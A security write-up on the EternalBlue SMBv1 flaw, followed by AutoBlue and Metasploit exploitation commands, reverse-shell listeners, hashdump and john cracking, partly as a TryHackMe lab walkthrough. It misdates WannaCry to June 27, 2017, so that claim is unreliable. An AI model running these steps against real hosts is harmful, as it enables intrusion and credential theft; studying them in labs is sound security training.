CVE-2017-0144: EternalBlue: MS17-010

Microsoft Security Bulletin MS17-010 - CriticalMicrosoftLearn

EternalBlue (MS17-010/CVE-2017-0144) is a critical vulnerability in the Windows Server Message Block (SMBv1) protocol that allows attackers to remotely execute arbitrary code and gain access to a Windows system, potentially compromising the entire network. The exploit, developed by the NSA, was leaked by a hacker group called the Shadow Brokers in 2017.

Why the Vulnerability Occurs

The vulnerability occurs due to improper handling of specially crafted SMBv1 packets, allowing attackers to send malicious packets to a vulnerable machine. This flaw enables attackers to execute arbitrary commands remotely without authentication.

The EternalBlue vulnerability occurs because of a buffer overflow in the Windows SMBv1 protocol caused by improper validation of transaction requests. Specifically, the vulnerability involves incorrectly handling the length of the input data fields and the error conditions, which allow attackers to execute arbitrary code remotely. This vulnerability leads to remote code execution with high-level privileges, making it a critical issue that can be exploited to propagate malware like WannaCry across networks.

NVD - cve-2017-0144nvd.nist.gov

Security Update Guide - Microsoft Security Response Centermsrc.microsoft.com

Key Features of EternalBlue

Exploits the SMBv1 vulnerability (MS17-010) in unpatched Windows systems.
Affected versions include Windows Vista, 7, Server 2008, 8.1, Server 2012, 10, and Server 2016.
Was infamously used in the WannaCry ransomware attack on June 27, 2017, which spread rapidly across networks.

Microsoft released a patch for the vulnerability in March 2017, but many systems remain unpatched, leaving them vulnerable to attacks.

Exploitation

MSF

Eternal Blue Exploit

EternalBlue allows attackers to send crafted packets to a vulnerable system, gaining privileged access. It has an MSF auxiliary module to check if a system is vulnerable and an exploit module to execute the attack, granting a privileged session on unpatched systems. The exploit can also be manually executed using publicly available code.

GitHub - EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-ExecutionGitHub

AutoBlue

GitHub - 3ndG4me/AutoBlue-MS17-010: This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010GitHub

# nmap for vulnerability assessment
nmap -sV [IP]
nmap -sV -p 445 --script smb-vuln-ms17-010 [IP]

# using autoblue
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
pip install -r requirements.txt

cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh

nc -lvnp 1234
chmod +x eternalblue_exploit_winx.py
python eternalblue_exploit_winx.py [Victim IP] shellcode/sc_x64.bin

# command shell on the listening port

TryHackMe:Blue Exploitation

BlueTryHackMe

# scan the machine
sudo nmap -Pn -sV -O -sS 10.10.17.20 -oX nmap-blue.xml

w/ MSF

db_import nmap-blue.xml
setg 10.10.17.20

# search and use scanning module
search type:auxiliary name:ms17
use auxiliary/scanner/smb/smb_ms17_010
run

# search and exploit -- easy way
search type:exploit name:ms17
use exploit/windows/smb/ms17_010_eternalblue

# search and exploit -- hard and developed way
set payload windows/x64/shell/reverse_tcp
exploit

# escalate shell to meterpreter session
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

# use the meterpreter session
sessions
sessions -i 2

# cracking
hashdump
# using john
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
# flag
meterpreter> search -f flag*.txt

w/ AutoBlue

# in the autoblue directory
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh

# reverse shell
nc -lvnp 4567
python eternalblue_exploit_winx.py 10.10.17.20 shellcode/sc_x64.bin